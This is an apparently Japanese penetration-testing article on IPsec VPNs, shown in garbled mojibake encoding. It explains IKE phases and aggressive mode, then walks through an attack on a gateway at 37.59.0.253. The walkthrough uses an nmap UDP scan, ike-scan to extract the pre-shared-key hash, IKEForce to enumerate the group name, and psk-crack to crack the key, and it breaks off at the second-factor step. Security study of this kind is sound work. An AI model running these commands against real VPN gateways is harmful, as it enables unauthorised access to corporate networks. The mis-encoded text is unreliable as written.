çŸä»£ã®äžçã§ã¯ãããããå Žæã§ããŸããŸãªVPNãã¯ãããžãŒã䜿çšãããŠããŸãã äžéšïŒPPTPãªã©ïŒã¯å®å šã§ã¯ãªããšèªèãããæéã®çµéãšãšãã«åŸã ã«æ¶æ» ããŸããããã®ä»ïŒOpenVPNïŒã¯éã«æ¯å¹Žå¢ããå¢ããŸãã ããããIPsec VPNã¯ãã»ãã¥ãªãã£ã§ä¿è·ããããã©ã€ããŒããã£ãã«ãäœæããã³ç¶æããããã®ãè°è«ã®äœå°ã®ãªããªãŒããŒã§ãããæãèªããããæè¡ã§ãã å Žåã«ãã£ãŠã¯ããã³ãã¹ãã§ã500åã®UDPããŒãã®ã¿ãçªãåºãŠããæ·±å»ã«ä¿è·ããããããã¯ãŒã¯ãèŠã€ããããšãã§ããŸãã ãã以å€ã¯ãã¹ãŠéããŠãããããé©çšãã確å®ã«ãã£ã«ã¿ãªã³ã°ã§ããŸãã
ãã®ãããªç¶æ³ã§ã¯ãããã§ç¹å¥ãªããšã¯äœããªããšããèããçãããããããŸããã ããããããã¯åžžã«ããã§ã¯ãããŸããã ããã«ãIPsecã¯ããã©ã«ãæ§æã§ãã¢ã¯ã»ã¹ã§ãããé©åãªã¬ãã«ã®ã»ãã¥ãªãã£ãæäŸãããšåºãä¿¡ããããŠããŸãã ãããä»æ¥ã®ç¶æ³ã§ãããå®éã«èŠãŠã¿ãŸãããã ãã ããæåã«ãIPsecãå¯èœãªéãå¹ççã«åŠçããã«ã¯ãIPsecãšã¯äœããã©ã®ããã«æ©èœããããææ¡ããå¿ èŠããããŸãã ãããè¡ããŸãïŒ
å éšããã®IPsec
IPsecèªäœã«çŽæ¥é²ãåã«ãäžè¬ã«ã©ã®ã¿ã€ãã®VPNãååšãããæãåºããŠãã ããã VPNã«ã¯éåžžã«å€ãã®åé¡ããããŸããããããã¯ãŒã¯ãã¯ãããžãŒã«ã€ããŠã¯è©³ãã説æãããæãåçŽãªãã®ãåãäžããŸãã ãããã£ãŠãVPNã2ã€ã®äž»ãªã¿ã€ãã«åå²ããŸãããµã€ãéVPNæ¥ç¶ïŒæ°žç¶çãšãåŒã°ããŸãïŒãšãªã¢ãŒãã¢ã¯ã»ã¹VPNïŒRAãäžæçïŒã§ãã
æåã®ã¿ã€ãã¯ãããŸããŸãªãããã¯ãŒã¯ã¢ã€ã©ã³ãã®æä¹ çãªæ¥ç¶ã«åœ¹ç«ã¡ãŸããããšãã°ãå€æ°ã®æ¯ç€Ÿãããäžå€®ãªãã£ã¹ã§ãã RA VPNã¯ãã¯ã©ã€ã¢ã³ããçæéæ¥ç¶ããç¹å®ã®ãããã¯ãŒã¯ãªãœãŒã¹ã«ã¢ã¯ã»ã¹ããäœæ¥ã®å®äºåŸã«å®å šã«åæããã·ããªãªã§ãã
æ»æãæåããå ŽåãäŒæ¥ã®å éšãããã¯ãŒã¯ã«ããã«ã¢ã¯ã»ã¹ã§ããããã2çªç®ã®ãªãã·ã§ã³ã«ãŸãã«èå³ããããŸãã 次ã«ãIPsecã䜿çšãããšããµã€ãéVPNãšãªã¢ãŒãã¢ã¯ã»ã¹VPNã®äž¡æ¹ãå®è£ ã§ããŸãã ããã¯ã©ã®ãããªæè¡ã§ãã©ã®ã³ã³ããŒãã³ãã§æ§æãããŠããŸããïŒ
IPsecã¯1ã€ã§ã¯ãªããééçã§å®å šãªããŒã¿ä¿è·ãæäŸããããŸããŸãªãããã³ã«ã®ã»ããã§ããããšã«æ³šæããŠãã ããã IPsecã®ç¹ç°æ§ã¯ããããã¯ãŒã¯ã¬ãã«ã§å®è£ ãããããšã§ããããããè£å®ããããšã§ã以éã®å±€ã§ã¯ãã¹ãŠãæ°ä»ãããããšãªãçºçããŸãã äž»ãªé£ç¹ã¯ãå®å šãªãã£ãã«ã®2人ã®åå è ãžã®æ¥ç¶ã確ç«ããããã»ã¹ã§ãããªãå€æ°ã®ç°ãªããã©ã¡ãŒã¿ãŒãåæããå¿ èŠãããããšã§ãã ã€ãŸããçžäºã«èªèšŒããããŒãçæããã³äº€æãïŒããã«ãä¿¡é Œã§ããªãç°å¢ãä»ããŠïŒãããŒã¿ãæå·åãããããã³ã«ã«ã€ããŠåæããå¿ èŠããããŸãã
IPsecããããã³ã«ã¹ã¿ãã¯ã§æ§æãããŠããã®ã¯ãã®ããã§ãããã®è²¬ä»»ã¯ãå®å šãªæ¥ç¶ã®ç¢ºç«ããã®æäœãšç®¡çãä¿èšŒããããšã§ãã æ¥ç¶ã確ç«ããããã»ã¹å šäœã«ã¯2ã€ã®ãã§ãŒãºãå«ãŸããŸãã1çªç®ã®ãã§ãŒãºã¯ã2çªç®ã®ãã§ãŒãºã§ã®ISAKMPã¡ãã»ãŒãžã®å®å šãªäº€æãä¿èšŒããããã«äœ¿çšãããŸãã ISAKMPïŒInternet Security Association and Key Management ProtocolïŒã¯ãVPNæ¥ç¶ã®åå è éã§ã»ãã¥ãªãã£ããªã·ãŒïŒSAïŒãããŽã·ãšãŒãããã³æŽæ°ããããã«äœ¿çšããããããã³ã«ã§ãã ãããã®ããªã·ãŒã¯ãæå·åãããããã³ã«ïŒAESãŸãã¯3DESïŒãšèªèšŒãããããã³ã«ïŒSHAãŸãã¯MD5ïŒã瀺ãã ãã§ãã
IPsecã®2ã€ã®äž»èŠãªãã§ãŒãº
ãã®ãããæåã«åå è ãã»ãã¥ã¢ãªæ¥ç¶ãäœæããã¡ã«ããºã ã«ã€ããŠåæããå¿ èŠãããããšãããã£ããããIKEãããã³ã«ãæå¹ã«ãªããŸããã IKEïŒã€ã³ã¿ãŒãããããŒãšã¯ã¹ãã§ã³ãžïŒã¯ãIPsec SAïŒã»ãã¥ãªãã£ã¢ãœã·ãšãŒã·ã§ã³ãããããšåãã»ãã¥ãªãã£ããªã·ãŒïŒã圢æãããããèšãæãããšãå®å šãªæ¥ç¶ã®åå è ã®äœæ¥ã調æŽããããã«äœ¿çšãããŸãã ãã®ãããã³ã«ãéããŠãåå è ã¯ãã©ã®æå·åã¢ã«ãŽãªãºã ãé©çšãããããæŽåæ§ãã§ãã¯ãå®è¡ãããã¢ã«ãŽãªãºã ãããã³çžäºã®èªèšŒæ¹æ³ã«åæããŸãã çŸåšããããã³ã«ã«ã¯IKEv1ãšIKEv2ã®2ã€ã®ããŒãžã§ã³ããããŸãã IKEv1ã®ã¿ã«é¢å¿ããããŸããã€ã³ã¿ãŒãããæè¡ç¹å¥èª¿æ»å§å¡äŒïŒIETFïŒã1998幎ã«æåã«å°å ¥ããŸããããç¹ã«RA VPNã§äœ¿çšãããŠããŸãïŒå³1ãåç §ïŒã
å³ 1. Cisco ASDM VPNãŠã£ã¶ãŒã
IKEv2ã«é¢ããŠã¯ã2005幎ã«æåã®ãã©ãããäœæãããRFC 5996ïŒ2010ïŒã§å®å šã«èª¬æãããæšå¹Žã®çµããã«ã€ã³ã¿ãŒãããæšæºïŒRFC 7296ïŒã®åœ¹å²ã«ã€ããŠçºè¡šãããŸããã ãµã€ãããŒã§IKEv1ãšIKEv2ã®éãã«ã€ããŠè©³ããèªãããšãã§ããŸãã IKEãåŠçããããIPsecãã§ãŒãºã«æ»ããŸãã æåã®ãã§ãŒãºã§ã¯ãåå è ã¯çžäºã«èªèšŒããç¹å¥ãªæ¥ç¶ãèšå®ããããã®ãã©ã¡ãŒã¿ã«åæããŸããããã¯ãç®çã®æå·åã¢ã«ãŽãªãºã ãå°æ¥ã®IPsecãã³ãã«ã®ãã®ä»ã®è©³çŽ°ã«é¢ããæ å ±ã®äº€æã®ã¿ãç®çãšããŠããŸãã ãã®æåã®ãã³ãã«ïŒISAKMPãã³ãã«ãšãåŒã°ããïŒã®ãã©ã¡ãŒã¿ãŒã¯ãISAKMPããªã·ãŒã«ãã£ãŠæ±ºå®ãããŸãã æåã«ãããã·ã¥ãšæå·åã¢ã«ãŽãªãºã ã«äžè²«æ§ãããã次ã«Diffie-HellmanïŒDHïŒããŒäº€æãè¡ããã誰ã誰ã§ããããæ確ã«ãªããŸãã ã€ãŸããPSKãŸãã¯RSAããŒã«ããèªèšŒããã»ã¹ãæåŸã«ãªããŸãã ãããŠãåœäºè ãåæã«éãããšãISAKMPãã³ãã«ã確ç«ãããIKEã®ç¬¬2ãã§ãŒãºããã§ã«ééããŸãã
2çªç®ã®ãã§ãŒãºã§ã¯ããã§ã«çžäºã«ä¿¡é ŒããŠããåå è ããããŒã¿ãçŽæ¥éä¿¡ããããã®ã¡ã€ã³ãã³ãã«ãæ§ç¯ããæ¹æ³ã«åæããŸãã ãããã¯ãtransform-setãã©ã¡ãŒã¿ãŒã§æå®ããããªãã·ã§ã³ãäºãã«æäŸããåæããå Žåãã¡ã€ã³ãã³ãã«ãäžããŸãã 確ç«åŸãè£å©ISAKMPãã³ãã«ã¯æ¶ããªãããšã匷調ããããšãéèŠã§ããããã¯ãã¡ã€ã³ãã³ãã«ã®SAãå®æçã«æŽæ°ããããã«äœ¿çšãããŸãã ãã®çµæãIPsecã¯äœããã®æ¹æ³ã§1ã€ã§ã¯ãªã2ã€ã®ãã³ãã«ã確ç«ããŸãã
ããŒã¿ã®åŠçæ¹æ³
次ã«ããã©ã³ã¹ãã©ãŒã ã»ããã«ã€ããŠããã€ã説æããŸãã çµå±ããã³ãã«ãééããããŒã¿ãäœããã®æ¹æ³ã§æå·åããå¿ èŠããããŸãã ãããã£ãŠãäžè¬çãªæ§æã§ã¯ããã©ã³ã¹ãã©ãŒã ã»ããã¯ããã±ãŒãžã®åŠçæ¹æ³ãæ瀺çã«æå®ãããã©ã¡ãŒã¿ãŒã®ã»ããã§ãã ãããã£ãŠããã®ãããªããŒã¿åŠçã«ã¯2ã€ã®ãªãã·ã§ã³ããããŸã-ãããã¯ESPããã³AHãããã³ã«ã§ãã ESPïŒEncapsulating Security PayloadïŒã¯ãããŒã¿ã®æå·åãçŽæ¥åŠçããããŒã¿ã®æŽåæ§æ€èšŒãæäŸã§ããŸãã AHïŒèªèšŒããããŒïŒã¯ããœãŒã¹ã®èªèšŒãšããŒã¿ã®æŽåæ§ã®ç¢ºèªã®ã¿ãè¡ããŸãã
ããšãã°ãã³ãã³ããcrypto ipsec transform-set SET10 esp-aesãã¯ããSET10ããšããååã®ãã©ã³ã¹ãã©ãŒã ã»ãããESPãããã³ã«ãšAESæå·åã§ã®ã¿åäœããããšãã«ãŒã¿ãŒã«æ瀺ããŸãã ä»åŸã¯ãã¿ãŒã²ãããšããŠã·ã¹ã³ã®ã«ãŒã¿ãŒãšãã¡ã€ã¢ãŠã©ãŒã«ã䜿çšããŸãã å®éãESPã§ã¯ãã¹ãŠãå€ããå°ãªããæ確ã§ããã圌ã®ä»äºã¯æå·åããŠæ©å¯æ§ã確ä¿ããããšã§ããããªãAHãå¿ èŠãªã®ã§ããããïŒ AHã¯ããŒã¿èªèšŒãæäŸããŸããã€ãŸãããã®ããŒã¿ã¯ãéä¿¡ã確ç«ããçžæããã®ãã®ã§ãããéäžã§å€æŽãããŠããªãããšã確èªããŸãã ã¢ã³ããªãã¬ã€ä¿è·ãšåŒã°ããããšããããŸãã ææ°ã®ãããã¯ãŒã¯ã§ã¯ãESHã®ã¿ãèŠã€ããããšãã§ãããã¹ãŠã®å Žæã§ãAHã¯å®éã«ã¯äœ¿çšãããŸããã
IPsecãã³ãã«å ã®æ å ±ãæå·åããããã«éžæããããã©ã¡ãŒã¿ãŒïŒå¥åSAïŒã«ã¯æå¹æéãããããã®åŸã¯äº€æããå¿ èŠããããŸãã ããã©ã«ãã®ã©ã€ãã¿ã€ã IPsec SAã¯86,400ç§ãã€ãŸã24æéã§ãã
ãã®çµæãåå è ã¯ããã¹ãŠã«é©ãããã©ã¡ãŒã¿ãæã€æå·åããããã³ãã«ãåä¿¡ããæå·åãããããŒã¿ã¹ããªãŒã ãããã«è»¢éããŸããã ã©ã€ãã¿ã€ã ã«åŸã£ãŠãå®æçã«ã¡ã€ã³ãã³ãã«ã®æå·åããŒãæŽæ°ãããŸããåå è ã¯ISAKMPãã³ãã«ãä»ããŠå床éä¿¡ãã第2ãã§ãŒãºãçµãŠSAãåã€ã³ã¹ããŒã«ããŸãã
IKEv1ã¢ãŒã
æåã®è¿äŒŒãšããŠãIPsecã®åºæ¬çãªã¡ã«ããºã ã«æ³šç®ããŸãããã泚ç®ãã¹ãç¹ãããã€ããããŸãã ãšããããæåã®ãã§ãŒãºã¯ãã¡ã€ã³ã¢ãŒããŸãã¯ã¢ã°ã¬ãã·ãã¢ãŒãã®2ã€ã®ã¢ãŒãã§æ©èœããŸãã äžèšã§æ¢ã«æ€èšããæåã®ãªãã·ã§ã³ã§ãããã¢ã°ã¬ãã·ãã¢ãŒãã«ã®ã¿é¢å¿ããããŸãã ãã®ã¢ãŒãã§ã¯ã3ã€ã®ã¡ãã»ãŒãžã䜿çšãããŸãïŒã¡ã€ã³ã¢ãŒãã§ã¯6ã€ã§ã¯ãããŸããïŒã åæã«ãæ¥ç¶ãéå§ãã人ã¯ããã¹ãŠã®ããŒã¿ãããã«æäŸããŸã-圌ãæããã®ãšã§ããããšããããŠDH亀æã®åœŒã®éšåã ãã®åŸãå¿çåŽã¯DHçæã®äžéšãããã«å®äºããŸãã ãã®çµæããã®ã¢ãŒãã§ã¯ãå®éã«ã¯2ã€ã®ã¹ããŒãžãããããŸããã ã€ãŸããã¡ã€ã³ã¢ãŒãïŒããã·ã¥ãããã³ã°ãšDH亀æïŒã®æåã®2ã€ã®ã¹ããŒãžã¯ããã®ãŸãŸ1ã€ã«å§çž®ãããŸãã çµæãšããŠããã®ã¢ãŒãã¯ãå¿çãšããŠãã¬ãŒã³ããã¹ãã§å€ãã®æè¡æ å ±ãæ¥ããšããçç±ã§ãã¯ããã«å±éºã§ãã ãããŠæãéèŠãªã®ã¯ãVPNã²ãŒããŠã§ã€ããã¹ã¯ãŒãããã·ã¥ãéä¿¡ã§ããããšã§ããããã¯ã第1ãã§ãŒãºã§ã®èªèšŒã«äœ¿çšãããŸãïŒãã®ãã¹ã¯ãŒãã¯ãå€ãã®å Žåãäºåå ±æããŒãŸãã¯PSKãšåŒã°ããŸãïŒã
ããŠããã®åŸã®æå·åã¯ãã¹ãŠãéåžžã©ããå€æŽãªãã§è¡ãããŸãã ãªããã®ã¢ãŒãããŸã 䜿çšãããŠããã®ã§ããïŒ å®éã«ã¯ãçŽ2åã®é«éã§ãã ãã³ãã¹ã¿ãŒã«ââãšã£ãŠç¹ã«èå³æ·±ãã®ã¯ãRA IPsec VPNã§ã¢ã°ã¬ãã·ãã¢ãŒããéåžžã«é »ç¹ã«äœ¿çšããããšããäºå®ã§ãã ã¢ã°ã¬ãã·ãã¢ãŒãã䜿çšããå Žåã®RA IPsec VPNã®ãã1ã€ã®å°ããªæ©èœïŒã¯ã©ã€ã¢ã³ãããµãŒããŒã«ã¢ã¯ã»ã¹ãããšãã¯ã©ã€ã¢ã³ãã«èå¥åïŒã°ã«ãŒãåïŒãéä¿¡ãããŸãã ãã³ãã«ã°ã«ãŒãåïŒå³2ãåç §ïŒã¯ããã®IPsecæ¥ç¶ã®ããªã·ãŒã®ã»ãããå«ããšã³ããªã®ååã§ãã ããã¯ãã·ã¹ã³æ©åšã«åºæã®æ©èœã®1ã€ã§ãã
å³ 2.ãã³ãã«ã°ã«ãŒãå
2ã€ã®ãã§ãŒãºã§ã¯äžååã§ãã
äœæ¥ã®ã¹ããŒã ã¯åçŽãããªãããšãå€æããããã«èŠããŸãããå®éã«ã¯ãŸã å°ãè€éã§ãã æéãçµã€ã«ã€ããŠãã»ãã¥ãªãã£ã確ä¿ããã«ã¯1ã€ã®PSKã ãã§ã¯äžååã§ããããšãæããã«ãªããŸããã ããšãã°ãåŸæ¥å¡ã®ã¯ãŒã¯ã¹ããŒã·ã§ã³ã䟵害ãããå Žåãæ»æè ã¯ããã«äŒæ¥ã®å éšãããã¯ãŒã¯å šäœã«ã¢ã¯ã»ã¹ããå¯èœæ§ããããŸãã ãããã£ãŠããã§ãŒãº1.5ã¯ãæåãš2çªç®ã®å€å žçãªãã§ãŒãºã®éã«çŽæ¥éçºãããŸããã ã¡ãªã¿ã«ããã®ãã§ãŒãºã¯éåžžãæšæºã®ãµã€ãéVPNæ¥ç¶ã§ã¯äœ¿çšãããŸãããããªã¢ãŒãVPNæ¥ç¶ãæŽçãããšãã«äœ¿çšãããŸãïŒãã®å ŽåïŒã ãã®ãã§ãŒãºã«ã¯ãæ¡åŒµèªèšŒïŒXAUTHïŒãšã¢ãŒãæ§æïŒMODECFGïŒã®2ã€ã®æ°ããæ¡åŒµæ©èœãå«ãŸããŸãã
XAUTHã¯ãIKEãããã³ã«å ã®ãŠãŒã¶ãŒã®è¿œå èªèšŒã§ãã ãã®èªèšŒã¯ã2çªç®ã®IPsecãã¡ã¯ã¿ãšãåŒã°ããŸãã ããŠãMODECFGã¯è¿œå æ å ±ãã¯ã©ã€ã¢ã³ãã«éä¿¡ããããã«äœ¿çšãããŸããIPã¢ãã¬ã¹ããã¹ã¯ãDNSãµãŒããŒãªã©ããããŸãã ãã®ãã§ãŒãºã¯ã以åã«æ€èšãããã§ãŒãºãåçŽã«è£å®ãããã®ã§ããããšãããããŸããããã®æçšæ§ã¯çãäœå°ããããŸããã
IKEv2ãšIKEv1
äž¡æ¹ã®ãããã³ã«ã¯UDPããŒãçªå·500ã§æ©èœããŸãããçžäºã«äºææ§ããããŸãããIKEv1ããã³ãã«ã®äžç«¯ã«ãããIKEv2ãä»ç«¯ã«ããããšã¯èš±å¯ãããŠããŸããã 2çªç®ã®ããŒãžã§ã³ãšæåã®ããŒãžã§ã³ã®äž»ãªéãã¯æ¬¡ã®ãšããã§ãã
-IKEv2ã§ã¯ãã¢ã°ã¬ãã·ãã¢ãŒããã¡ã€ã³ã¢ãŒããªã©ã®æŠå¿µã¯ãªããªããŸããã
-IKEv2ã§ã¯ãæåã®ãã§ãŒãºãšããçšèªã¯IKE_SA_INITïŒæå·å/ããã·ã¥ãããã³ã«ãšDHããŒçæã®ããŽã·ãšãŒã·ã§ã³ãä¿èšŒãã2ã€ã®ã¡ãã»ãŒãžã®äº€æïŒã«çœ®ãæãããã2çªç®ã®ãã§ãŒãºã¯IKE_AUTHïŒèªèšŒèªäœãå®è£ ãã2ã€ã®ã¡ãã»ãŒãžïŒã«çœ®ãæããããŸãã
-Mode ConfigïŒIKEv1ããã§ãŒãº1.5ãšåŒãã ãã®ïŒã¯ãçŸåšãããã³ã«ä»æ§ã«çŽæ¥èšè¿°ãããŠããããã®äžå¯æ¬ ãªéšåã§ãã
-IKEv2ã¯ãDoSæ»æã«å¯Ÿããè¿œå ã®ä¿è·ã¡ã«ããºã ãè¿œå ããŸããã ãã®æ¬è³ªã¯ãå®å šãªæ¥ç¶ïŒIKE_SA_INITïŒIKEv2ã確ç«ããããã«åèŠæ±ã«å¿çããåã«ãVPNã²ãŒããŠã§ã€ããã®ãããªèŠæ±ã®ãœãŒã¹ã«Cookieãéä¿¡ããå¿çãåŸ ã€ããšã§ãã ãœãŒã¹ãå¿çããå Žå-ãã¹ãŠãæ£åžžã§ããå Žåãããã䜿çšããŠDHçæãéå§ã§ããŸãã ãœãŒã¹ãå¿çããªãå ŽåïŒDoSæ»æã®å Žåããã®ææ³ã¯TCP SYNãã©ããã«äŒŒãŠããŸãïŒãVPNã²ãŒããŠã§ã€ã¯ãããå¿ããŸãã ãã®ã¡ã«ããºã ããªããšãVPNã²ãŒããŠã§ã€ã¯ã ãããã®èŠæ±ã§ããDHããŒïŒããªããªãœãŒã¹ãæ¶è²»ããããã»ã¹ïŒãçæããããšããããã«åé¡ãçºçããŸãã ãã®çµæããã¹ãŠã®æäœãæ¥ç¶ã®å察åŽããã®ç¢ºèªãèŠæ±ããããã«ãªã£ããããæ»æãããããã€ã¹ã§å€æ°ã®ããŒããªãŒãã³ã»ãã·ã§ã³ãäœæã§ããŸããã
è¡ã«è¡ããŸã
æåŸã«ãIPsecãšãã®ã³ã³ããŒãã³ããã©ã®ããã«æ©èœããããç解ããã®ã§ã次ã«é²ãããšãã§ããŸã-å®éã®æ»æã ããããžã¯éåžžã«ã·ã³ãã«ã§ãããåæã«çŸå®ã«è¿ããã®ã«ãªããŸãïŒå³3ãåç §ïŒã
å³ 3.äžè¬çãªãããã¯ãŒã¯å³
æåã®æé ã¯ãIPsec VPNã²ãŒããŠã§ã€ãå©çšå¯èœãã©ãããå€æããããšã§ãã ããã¯ããŒããã¹ãã£ã³ããããšã§å®è¡ã§ããŸãããå°ããªæ©èœããããŸãã ISAKMPã¯UDPãããã³ã«ã®ããŒã500ã䜿çšããŸãããNmapã䜿çšããããã©ã«ãã®ã¹ãã£ã³ã¯TCPããŒãã®ã¿ã«åœ±é¿ããŸãã çµæã¯ã37.59.0.253ã§ã¹ãã£ã³ããã1000åã®ããŒããã¹ãŠããã£ã«ã¿ãªã³ã°ãããŸãããšããã¡ãã»ãŒãžã«ãªããŸãã
ãã¹ãŠã®ããŒãããã£ã«ã¿ãªã³ã°ãããŠãããéããŠããããŒãããªãããã§ãã ããããã³ãã³ããå®è¡ãã
nmap -sU --top-ports=20 37.59.0.253 Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-21 12:29 GMT Nmap scan report for 37.59.0.253 Host is up (0.066s latency). PORT STATE SERVICE 500/udp open isakmp
ããã¯ããã§ã¯ãªããšç¢ºä¿¡ããŠãããå®éã«VPNããã€ã¹ã«çŽé¢ããŠããŸãã
æåã®ãã§ãŒãºãæ»æãã
ããã§ãæåã®ãã§ãŒãºã§ããã¢ã°ã¬ãã·ãã¢ãŒããšäºåå ±æããŒïŒPSKïŒã䜿çšããèªèšŒã«æ³šç®ããŸãã ãã®ã·ããªãªã§ã¯ãVPNããã€ã¹ãŸãã¯ã¬ã¹ãã³ããŒãããã·ã¥ãããPSKãã€ãã·ãšãŒã¿ãŒã«éä¿¡ããŸãã IKEãããã³ã«ããã¹ãããããã®æãæåãªããŒã«ã®1ã€ã¯ãKali Linuxãã£ã¹ããªãã¥ãŒã·ã§ã³ã®äžéšã§ããike-scanã§ãã Ike-scanã§ã¯ãããŸããŸãªãã©ã¡ãŒã¿ãŒã䜿çšããŠIKEã¡ãã»ãŒãžãéä¿¡ããããã«å¿ããŠå¿çãã±ããããã³ãŒãããã³è§£æã§ããŸãã ã¿ãŒã²ããããã€ã¹ã®ãããŒããè©Šã¿ãŸãã
root@kali:~# ike-scan -M -A 37.59.0.253 0 returned handshake; 0 returned notify
å³ 4. Ike-scanã¢ã°ã¬ãã·ãã¢ãŒã
`-A`ããŒã¯ã¢ã°ã¬ãã·ãã¢ãŒãã䜿çšããå¿ èŠãããããšã瀺ãã` -M`ããŒã¯èªã¿ãããããã«çµæã1è¡ãã€ïŒè€æ°è¡ïŒåºåããããšã瀺ããŸãã çµæãåŸãããªãã£ãããšãããããŸãã ãã®çç±ã¯ãVPNã°ã«ãŒãã®ååãšåãèå¥åãæå®ããå¿ èŠãããããã§ãã ãã¡ãããike-scanãŠãŒãã£ãªãã£ã䜿çšãããšããã®èå¥åããã©ã¡ãŒã¿ã®1ã€ãšããŠèšå®ã§ããŸãã ãããããŸã ããããªãã®ã§ã0000ãªã©ã®ä»»æã®å€ãåããŸãã
root@kali:~# ike-scan -M -A --id=0000 37.59.0.253 37.59.0.253 Aggressive Mode Handshake returned
å³ 5. Ike-scan ID
ä»åã¯ãåçãåä¿¡ãããããšããããïŒå³5ãåç §ïŒãéåžžã«å€ãã®æçšãªæ å ±ãæäŸãããŸããã åä¿¡ããæ å ±ã®ããªãéèŠãªéšåã¯ããã©ã³ã¹ãã©ãŒã ã»ããã§ãã ãã®å ŽåããEnc = 3DES Hash = SHA1 Group = 2ïŒmodp1024 Auth = PSKããšè¡šç€ºãããŸãã
ããããã¹ãŠã®ãã©ã¡ãŒã¿ãŒã¯ã `--trans`ã¹ã€ããã䜿çšããŠike-scanãŠãŒãã£ãªãã£ã«æå®ããããšãã§ããŸãã ããšãã°ã `--trans = 5,2,1,2`ã¯ã3DESæå·åã¢ã«ãŽãªãºã ãHMAC-SHAããã·ã¥ãPSKèªèšŒæ¹æ³ãããã³DHã°ã«ãŒãã®ç¬¬2ã®ã¿ã€ãïŒ1024ãããMODPïŒãæå³ããŸãã ãã®ã¢ãã¬ã¹ã®éä¿¡å€ã®è¡šãåç §ããŠãã ããã ããã±ãŒãžã®ãã€ããŒããçŽæ¥ããŸãã¯PSKããã·ã¥ãåºåããã«ã¯ãå¥ã®ããŒïŒ `-P`ïŒãè¿œå ããŸãã
root@kali:~# ike-scan -M -A --id=0000 37.59.0.253 -P
å³ 6. Ike-scanãã€ããŒã
æåã®å°é£ãå æãã
ããã·ã¥ãåä¿¡ãããããã«èŠããã®ã§ãããããã«ãŒãããããšãã§ããŸãããããã»ã©åçŽã§ã¯ãããŸããã ãã€ãŠ2005幎ã«ãäžéšã®Ciscoã°ã©ã³ãã«è匱æ§ããããŸããããããã®ããã€ã¹ã¯ãæ»æè ãæ£ããIDå€ãéä¿¡ããå Žåã«ã®ã¿ããã·ã¥ãè¿ããŸããã ãã¡ããããã®ãããªæ©åšãæºããããšã¯ã»ãŒäžå¯èœã§ãããæ»æè ãæ£ããIDå€ãéä¿¡ãããã©ããã«é¢ä¿ãªããããã·ã¥å€ãåžžã«éä¿¡ãããŸãã æããã«ãééã£ãããã·ã¥ãæã€ããšã¯ç¡æå³ã§ãã ãããã£ãŠãæåã®ã¿ã¹ã¯ã¯æ£ããIDå€ã決å®ããŠæ£ããããã·ã¥ãååŸããããšã§ãã ãããŠãæ°ãã«çºèŠãããè匱æ§ãããã«åœ¹ç«ã¡ãŸãã
å®éã«ã¯ãæåã®ã¡ãã»ãŒãžã³ã°äžã®å¿çã«ã¯ããããªéãããããŸãã ã€ãŸããæ£ããã°ã«ãŒãåã䜿çšãããšãVPNæ¥ç¶ã®ç¢ºç«ãç¶ç¶ããããã«4åè©Šè¡ãããããã«2çªç®ã®ãã§ãŒãºã®2ã€ã®æå·åããããã±ãããè©Šè¡ãããŸãã äžæ¹ãIDãæ£ãããªãå Žåãå¿çã§å°çãããã±ããã¯2ã€ã ãã§ãã ã芧ã®ãšããããã®éãã¯éåžžã«å€§ãããããSpiderLabsïŒããŸããããããã¬ã¹ãã³ããŒããŒã«ã®äœæè ïŒã¯ãæåã«PoCãéçºãã次ã«IKEForceãéçºããŠãã®è匱æ§ãæªçšããŸããã
IKEã®åãšã¯
ã³ãã³ããå®è¡ããŠãIKEForceãä»»æã®ãã£ã¬ã¯ããªã«ã€ã³ã¹ããŒã«ã§ããŸãã
git clone https://github.com/SpiderLabs/ikeforce
èšç®ã¢ãŒãã-eãïŒåæïŒãšç·åœããã¢ãŒãã-bãïŒç·åœããïŒã®2ã€ã®äž»ãªã¢ãŒãã§åäœããŸãã 2çªç®ã®èŠå ã«å¯Ÿããæ»æãèŠããšã2çªç®ã®èŠå ã«å°éããŸãããä»åºŠã¯1çªç®ã®èŠå ãåãäžããŸãã IDã®æ±ºå®ããã»ã¹ãéå§ããåã«ãtransform-setã®æ£ç¢ºãªå€ãèšå®ããå¿ èŠããããŸãã 以åã«å®çŸ©ããã®ã§ããªãã·ã§ã³-t 5 2 1 2ãæå®ããŸãã ãã®çµæãIDãèŠã€ããããã»ã¹ã¯æ¬¡ã®ããã«ãªããŸãã
python ikeforce.py 37.59.0.253 -e -w wordlists/group.txt -t 5 2 1 2
å³ 7. IKEForceåæ
ãã®çµæãæ£ããIDå€ããã°ããååŸã§ããŸããïŒå³7ïŒã æåã®ã¹ããããå®äºããããå ã«é²ãããšãã§ããŸãã
PSKãå ¥æãã
æ£ããã°ã«ãŒãåã䜿çšããŠPSKããã·ã¥ããã¡ã€ã«ã«ä¿åããå¿ èŠããããŸããike-scanã䜿çšããŠãããå®è¡ã§ããŸãã
ike-scan -M -A --id=vpn 37.59.0.253 -Pkey.psk
æ£ããIDå€ãéžæãããæ£ããPSKããã·ã¥ãååŸã§ããããã«ãªã£ãã®ã§ããããããªãã©ã€ã³ã®ç·åœããæ»æãéå§ã§ããŸãã ãã®ãããªãã«ãŒââããã©ãŒã¹ã«ã¯å€ãã®ãªãã·ã§ã³ããããŸã-ããã¯å€å žçãªãŠãŒãã£ãªãã£psk-crackãJohn the RipperïŒãžã£ã³ããããä»ãïŒãããã«ã¯oclHashcatã§ããããåç¥ã®ããã«GPUã®ãã¯ãŒã䜿çšã§ããŸãã ç°¡åã«ããããã«ãçŽæ¥ãã«ãŒããã©ãŒã¹ãšèŸæžæ»æã®äž¡æ¹ããµããŒãããpsk-crackã䜿çšããŸãã
psk-crack -d /usr/share/ike-scan/psk-crack-dictionary key.psk
å³ 8. Pskã¯ã©ãã¯
ããããPSKïŒå³8ãåç §ïŒãæ£åžžã«åŸ©å ããŠããæŠãã®ååã«éããŸããã ãã®æ®µéã§ã¯ã次ã«XAUTHãš2çªç®ã®èŠçŽ ã§ããIPsec VPNãæ¥ãããšãèŠããŠããå¿ èŠããããŸãã
2çªç®ã®IPsecãã¡ã¯ã¿ãŒãžã®å¯ŸåŠ
